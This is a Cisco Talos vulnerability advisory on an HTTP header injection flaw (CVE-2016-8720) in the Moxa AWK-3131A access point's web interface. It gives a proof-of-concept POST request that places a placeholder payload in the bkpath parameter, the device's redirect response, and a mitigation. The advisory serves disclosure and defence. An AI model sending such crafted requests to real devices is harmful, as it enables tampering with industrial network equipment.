Talos Vulnerability Report

TALOS-2016-0234

Moxa AWK-3131A Web Application bkpath HTTP Header Injection Vulnerability

April 10, 2017
CVE Number

CVE-2016-8720

Summary

An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted HTTP request can inject a payload in the bkpath parameter which will be copied in to Location header of the HTTP response.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

http://www.moxa.com/product/AWK-3131A.htm

CVSSv3 Score

3.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Details

An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted HTTP request can inject a payload in the bkpath parameter which will be copied in to Location header of the HTTP response. This vulnerability can be exploited in order to execute a variety of other attacks.

Exploit Proof-of-Concept

Request

POST /forms/iw_webSetParameters HTTP/1.1
Host: <device IP>
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<device IP>/time_set.asp
Cookie: Password508=<valid token>
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 486

iw_IWtime_timeZone=22&iw_IWtime_dstOnMonth=Oct.&iw_IWtime_dstOnWeekIndex=1st&iw_IWtime_dstOnWeekDay=Sun.&iw_IWtime_dstOnTrigHour=00&iw_IWtime_dstOnTrigMin=00&iw_IWtime_dstOffMonth=Oct.&iw_IWtime_dstOffWeekIndex=Last&iw_IWtime_dstOffWeekDay=Sun.&iw_IWtime_dstOffTrigHour=00&iw_IWtime_dstOffTrigMin=00&iw_IWtime_dstOffsetTime=%2B01%3A00&iw_IWtime_firstTimeSrv=time.nist.gov&iw_IWtime_secondTimeSrv=&iw_IWtime_queryPeriod=600&Submit=Submit&bkpath=EVIL_INJECTION&iw_IWtime_dstEnable=DISABLE

Response

HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Mon Oct 31 17:33:45 2016
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Type: text/html
Location: http://<device IP>/EVIL_INJECTION

<html><head></head><body>
..This document has moved to a new <a href="http://<device IP>/EVIL_INJECTION">location</a>.
..Please update your documents to reflect the new location.
..</body></html>

Mitigation

To significantly mitigate risk of exploitation, disable the web application before the device is deployed.

Timeline

2016-11-14 - Vendor Disclosure
2017-04-10 - Public Release

Credit

Discovered by Patrick DeSantis of Cisco Talos.